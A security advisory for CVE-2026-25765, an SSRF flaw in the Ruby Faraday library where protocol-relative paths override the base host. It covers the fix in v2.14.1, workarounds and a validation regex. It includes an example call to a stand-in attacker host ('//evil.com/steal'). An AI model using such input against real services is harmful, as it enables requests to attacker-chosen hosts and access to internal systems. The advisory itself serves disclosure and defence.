CVE-2026-25765

Description

### Impact Faraday's `build_exclusive_url` method (in `lib/faraday/connection.rb`) uses Ruby's `URI#merge` to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. `//evil.com/path`) are treated as network-path references that override the base URL's host/authority component. This means that if any application passes user-controlled input to Faraday's `get()`, `post()`, `build_url()`, or other request methods, an attacker can supply a protocol-relative URL like `//attacker.com/endpoint` to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF). The `./` prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with `/`, so protocol-relative URLs bypass it entirely. **Example:** ```ruby conn = Faraday.new(url: 'https://api.internal.com') conn.get('//evil.com/steal') # Request is sent to https://evil.com/steal instead of api.internal.com ``` ### Patches Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected. ### Workarounds **NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.** Applications should validate and sanitize any user-controlled input before passing it to Faraday request methods. Specifically: - Reject or strip input that starts with // followed by a non-/ character - Use an allowlist of permitted path prefixes - Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday Example validation: ```ruby def safe_path(user_input) raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]}) user_input end ```

How to fix CVE-2026-25765

To remediate CVE-2026-25765, upgrade the affected package to a fixed version below.

• —no fix listed
• —upgrade to 2.14.1 or later

Is CVE-2026-25765 being exploited?

Low — EPSS is 0.0%, meaning exploitation activity has not been observed at scale.